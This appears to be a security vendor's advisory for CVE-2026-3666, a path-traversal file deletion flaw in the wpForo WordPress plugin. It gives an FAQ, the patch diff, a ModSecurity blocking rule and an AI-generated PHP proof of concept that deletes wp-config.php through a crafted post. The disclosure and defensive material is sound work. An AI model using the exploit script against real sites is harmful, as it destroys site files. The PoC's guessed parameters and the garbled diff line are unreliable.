What is CVE-2026-3666?

CVE-2026-3666 is a high-severity vulnerability in the wpForo Forum plugin for WordPress, affecting versions up to and including 2.4.16. It allows authenticated users with subscriber-level access or higher to delete arbitrary files on the server due to inadequate validation of file paths in post content.

How does the vulnerability work?

The vulnerability arises from a lack of proper sanitization of file paths extracted from forum post bodies. An attacker can embed a crafted path traversal string in a post, and upon deleting that post, the plugin may execute a file deletion operation on an unintended file path, potentially leading to critical file deletion.

Who is affected by this vulnerability?

Any WordPress site using the wpForo Forum plugin version 2.4.16 or earlier is affected. Specifically, authenticated users with subscriber privileges or higher can exploit this vulnerability to delete files.

How can I check if my site is vulnerable?

To check if your site is vulnerable, verify the version of the wpForo plugin installed on your WordPress site. If the version is 2.4.16 or earlier, your site is susceptible to this vulnerability.

How can I fix CVE-2026-3666?

To fix the vulnerability, update the wpForo plugin to version 2.4.17 or later. This version includes security enhancements that prevent the exploitation of the arbitrary file deletion flaw.

What are the risks associated with this vulnerability?

Exploitation of this vulnerability can lead to the deletion of critical files such as wp-config.php, which can cause site failure and expose sensitive information. It may also allow attackers to delete other important files, leading to complete site compromise and data loss.

What does a CVSS score of 8.8 indicate?

A CVSS score of 8.8 indicates a high severity level for this vulnerability, meaning it poses a significant risk to affected systems. It suggests that exploitation could lead to severe consequences, including data loss and service interruption.

What steps can I take to mitigate this vulnerability?

In addition to updating the plugin, consider implementing strict user access controls to limit who can delete posts. Regularly audit your WordPress site for vulnerabilities and ensure all plugins and themes are up to date.

How does the proof of concept demonstrate the issue?

The proof of concept illustrates how an authenticated user can exploit the vulnerability by crafting a post with a path traversal payload. It shows the steps to authenticate, create a malicious post, and subsequently delete it to trigger the arbitrary file deletion.

What is path traversal and why is it a concern?

Path traversal is a security vulnerability that allows an attacker to access files and directories stored outside the intended directory. It is concerning because it can lead to unauthorized file access and manipulation, potentially compromising sensitive data.

What should I do if I cannot update the plugin immediately?

If you cannot update the plugin immediately, consider disabling the wpForo plugin temporarily or restricting access to authenticated users until the patch can be applied. Monitor your site for unusual activity and review user permissions.

How can I stay informed about vulnerabilities like CVE-2026-3666?

To stay informed, subscribe to security mailing lists, follow WordPress security blogs, and regularly check the official WordPress plugin repository for updates and security advisories related to the plugins you use.

Atomic Edge Proof of Concept automated generator using AI diff analysis

Published : April 6, 2026

CVE-2026-3666: wpForo Forum <= 2.4.16 – Authenticated (Subscriber+) Arbitrary File Deletion via Post Body (wpforo)

CVE ID CVE-2026-3666

Plugin wpforo

Severity High (CVSS 8.8)

CWE 22

Vulnerable Version 2.4.16

Patched Version 2.4.17

Disclosed April 2, 2026

Analysis Overview

Atomic Edge analysis of CVE-2026-3666:
This vulnerability is an authenticated path traversal and arbitrary file deletion flaw in the wpForo Forum WordPress plugin. The vulnerability exists in the post deletion routine, which fails to properly sanitize file paths extracted from post content. Attackers with subscriber-level access or higher can delete any file on the server that the web process can write to, leading to a high severity impact.

The root cause is the lack of path traversal validation in the `wpforo/classes/Posts.php` file. In the vulnerable version 2.4.16, the `delete()` function (around line 1371) extracts file paths from a post’s body content using a regular expression. It directly concatenates the extracted `$filename` with the base attachments directory to form the `$file` path. This process does not filter directory traversal sequences like `../` or `./`, allowing an attacker to craft a post body that references files outside the intended `wpforo/default_attachments/` directory.

Exploitation requires an authenticated attacker with at least subscriber privileges. The attacker first creates a forum post containing an embedded image or attachment reference with a crafted path traversal payload, such as `../../../wp-config.php`. The plugin’s parsing regex in `Posts.php` will match this path. When the attacker subsequently deletes that post, the plugin’s `delete()` function executes. It searches for the referenced file path and, finding no other posts linking to it, proceeds to call `unlink($file)` on the constructed traversal path, deleting the targeted file.

The patch in version 2.4.17 introduces multiple layers of defense in `wpforo/classes/Posts.php`. First, it adds a sanitization step: `$filename = str_replace( [ ‘../’, ‘./’, ” ], ”, $filename );`. This removes basic traversal sequences. Second, and more critically, it implements a realpath validation check. The code now resolves the full `$real_file` path and the intended base `$real_dir`. It then verifies that the `$real_file` string begins with the `$real_dir . DIRECTORY_SEPARATOR` prefix. If this check fails, the file is skipped, preventing deletion of any file outside the designated directory. This fix ensures the file operation is confined to the intended directory tree.

Successful exploitation leads to arbitrary file deletion. Attackers can delete critical WordPress files like `wp-config.php`, causing site failure and potentially exposing database credentials. They can also delete system files, plugin files, or user-uploaded content, leading to complete site compromise, denial of service, and data loss. This vulnerability could be a precursor to privilege escalation by deleting security or authentication files.

Differential between vulnerable and patched code

Below is a differential between the unpatched vulnerable code and the patched update, for reference.

Code Diff

--- a/wpforo/classes/Posts.php
+++ b/wpforo/classes/Posts.php
@@ -1371,7 +1371,13 @@
 			if( preg_match_all( '|/wpforo/default_attachments/([^s"]]+)|i', (string) $post['body'], $attachments, PREG_SET_ORDER ) ) {
 				foreach( $attachments as $attachment ) {
 					$filename = trim( $attachment[1] );
+					$filename = str_replace( [ '../', './', '\' ], '', $filename );
 					$file     = WPF()->folders['default_attachments']['dir'] . DIRECTORY_SEPARATOR . $filename;
+					$real_file = realpath( $file );
+					$real_dir  = realpath( WPF()->folders['default_attachments']['dir'] );
+					if( ! $real_file || ! $real_dir || strpos( $real_file, $real_dir . DIRECTORY_SEPARATOR ) !== 0 ) {
+						continue;
+					}
 					if( file_exists( $file ) ) {
 						$posts = WPF()->db->get_var( "SELECT COUNT(*) as posts FROM `" . WPF()->tables->posts . "` WHERE `body` LIKE '%" . esc_sql( $attachment[0] ) . "%'" );
 						if( is_numeric( $posts ) && $posts == 1 ) {
--- a/wpforo/wpforo.php
+++ b/wpforo/wpforo.php
@@ -5,7 +5,7 @@
 * Description: WordPress Forum plugin. wpForo is a full-fledged forum solution for your community. Comes with multiple modern forum layouts.
 * Author: gVectors Team
 * Author URI: https://gvectors.com/
-* Version: 2.4.16
+* Version: 2.4.17
 * Requires at least: 5.2
 * Requires PHP: 7.2
 * Text Domain: wpforo
@@ -14,7 +14,7 @@

 namespace wpforo;

-define( 'WPFORO_VERSION', '2.4.16' );
+define( 'WPFORO_VERSION', '2.4.17' );

 //Exit if accessed directly
 if( ! defined( 'ABSPATH' ) ) exit;

ModSecurity Protection Against This CVE

Here you will find our ModSecurity compatible rule to protect against this particular CVE.

ModSecurity

# Atomic Edge WAF Rule - CVE-2026-3666
SecRule REQUEST_URI "@streq /wp-admin/admin-ajax.php" 
  "id:10003666,phase:2,deny,status:403,chain,msg:'CVE-2026-3666 Arbitrary File Deletion via wpForo AJAX',severity:'CRITICAL',tag:'CVE-2026-3666',tag:'wordpress',tag:'wpforo'"
  SecRule ARGS_POST:action "@streq wpforo_ajax" "chain"
    SecRule ARGS_POST:wpforo_subaction "@streq post_delete" "chain"
      SecRule REQUEST_BODY "@rx wpforo/default_attachments/(?:[.\/]*\\)*[.\/][.\/]" 
        "t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase"

Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

PHP PoC

// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept
// CVE-2026-3666 - wpForo Forum <= 2.4.16 - Authenticated (Subscriber+) Arbitrary File Deletion via Post Body

<?php

$target_url = 'http://target-wordpress-site.com'; // CONFIGURE THIS
$username = 'subscriber_user'; // CONFIGURE THIS
$password = 'subscriber_pass'; // CONFIGURE THIS
$file_to_delete = '../../../wp-config.php'; // Relative path traversal to target file

// Step 1: Authenticate and obtain WordPress cookies and nonce
$login_url = $target_url . '/wp-login.php';
$login_data = array(
    'log' => $username,
    'pwd' => $password,
    'wp-submit' => 'Log In',
    'redirect_to' => $target_url . '/wp-admin/',
    'testcookie' => '1'
);

$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $login_url);
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($login_data));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_COOKIEJAR, 'cookies.txt');
curl_setopt($ch, CURLOPT_COOKIEFILE, 'cookies.txt');
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
$login_response = curl_exec($ch);

// Step 2: Create a new forum post with the malicious file reference in the body.
// The body must contain a path matching the plugin's regex: /wpforo/default_attachments/{path}
// We embed a traversal sequence to target a file outside the intended directory.
$create_post_url = $target_url . '/wp-admin/admin-ajax.php';
$post_body_content = 'Some forum text. <img src="/wpforo/default_attachments/' . $file_to_delete . '" /> More text.';
$create_data = array(
    'action' => 'wpforo_ajax', // This is a generic wpForo AJAX hook; the specific sub-action may vary.
    'wpforo_subaction' => 'post_add', // Assumed sub-action for adding a post. May require adjustment based on forum setup.
    'post' => array(
        'forumid' => 1, // Assumes a valid forum ID. Attacker would need to identify one.
        'title' => 'Malicious Post',
        'body' => $post_body_content,
        'topicid' => 0 // For a new topic
    )
);

curl_setopt($ch, CURLOPT_URL, $create_post_url);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($create_data));
$create_response = curl_exec($ch);

// Parse the response to get the new post ID. The actual response structure would need inspection.
// For the PoC, we assume we extract $post_id.
$post_id = 123; // PLACEHOLDER: Attacker would extract this from $create_response.

// Step 3: Delete the newly created post, triggering the vulnerable file deletion routine.
$delete_data = array(
    'action' => 'wpforo_ajax',
    'wpforo_subaction' => 'post_delete',
    'postid' => $post_id
);

curl_setopt($ch, CURLOPT_URL, $create_post_url);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($delete_data));
$delete_response = curl_exec($ch);

curl_close($ch);

echo "Check if the target file '$file_to_delete' has been deleted.n";

?>

Frequently Asked Questions

What is CVE-2026-3666?
Overview of the vulnerability
CVE-2026-3666 is a high-severity vulnerability in the wpForo Forum plugin for WordPress, affecting versions up to and including 2.4.16. It allows authenticated users with subscriber-level access or higher to delete arbitrary files on the server due to inadequate validation of file paths in post content.
How does the vulnerability work?
Mechanism of exploitation
The vulnerability arises from a lack of proper sanitization of file paths extracted from forum post bodies. An attacker can embed a crafted path traversal string in a post, and upon deleting that post, the plugin may execute a file deletion operation on an unintended file path, potentially leading to critical file deletion.
Who is affected by this vulnerability?
Identifying affected users
Any WordPress site using the wpForo Forum plugin version 2.4.16 or earlier is affected. Specifically, authenticated users with subscriber privileges or higher can exploit this vulnerability to delete files.
How can I check if my site is vulnerable?
Verifying plugin version
To check if your site is vulnerable, verify the version of the wpForo plugin installed on your WordPress site. If the version is 2.4.16 or earlier, your site is susceptible to this vulnerability.
How can I fix CVE-2026-3666?
Applying the necessary patch
To fix the vulnerability, update the wpForo plugin to version 2.4.17 or later. This version includes security enhancements that prevent the exploitation of the arbitrary file deletion flaw.
What are the risks associated with this vulnerability?
Potential impacts of exploitation
Exploitation of this vulnerability can lead to the deletion of critical files such as wp-config.php, which can cause site failure and expose sensitive information. It may also allow attackers to delete other important files, leading to complete site compromise and data loss.
What does a CVSS score of 8.8 indicate?
Understanding severity ratings
A CVSS score of 8.8 indicates a high severity level for this vulnerability, meaning it poses a significant risk to affected systems. It suggests that exploitation could lead to severe consequences, including data loss and service interruption.
What steps can I take to mitigate this vulnerability?
Preventive measures
In addition to updating the plugin, consider implementing strict user access controls to limit who can delete posts. Regularly audit your WordPress site for vulnerabilities and ensure all plugins and themes are up to date.
How does the proof of concept demonstrate the issue?
Understanding the exploitation example
The proof of concept illustrates how an authenticated user can exploit the vulnerability by crafting a post with a path traversal payload. It shows the steps to authenticate, create a malicious post, and subsequently delete it to trigger the arbitrary file deletion.
What is path traversal and why is it a concern?
Explaining the attack vector
Path traversal is a security vulnerability that allows an attacker to access files and directories stored outside the intended directory. It is concerning because it can lead to unauthorized file access and manipulation, potentially compromising sensitive data.
What should I do if I cannot update the plugin immediately?
Temporary measures until a patch is applied
If you cannot update the plugin immediately, consider disabling the wpForo plugin temporarily or restricting access to authenticated users until the patch can be applied. Monitor your site for unusual activity and review user permissions.
How can I stay informed about vulnerabilities like CVE-2026-3666?
Keeping up with security updates
To stay informed, subscribe to security mailing lists, follow WordPress security blogs, and regularly check the official WordPress plugin repository for updates and security advisories related to the plugins you use.

How Atomic Edge Works

Simple Setup. Powerful Security.

Atomic Edge acts as a security layer between your website & the internet. Our AI inspection and analysis engine auto blocks threats before traditional firewall services can inspect, research and build archaic regex filters.

Get Started

Trusted by Developers & Organizations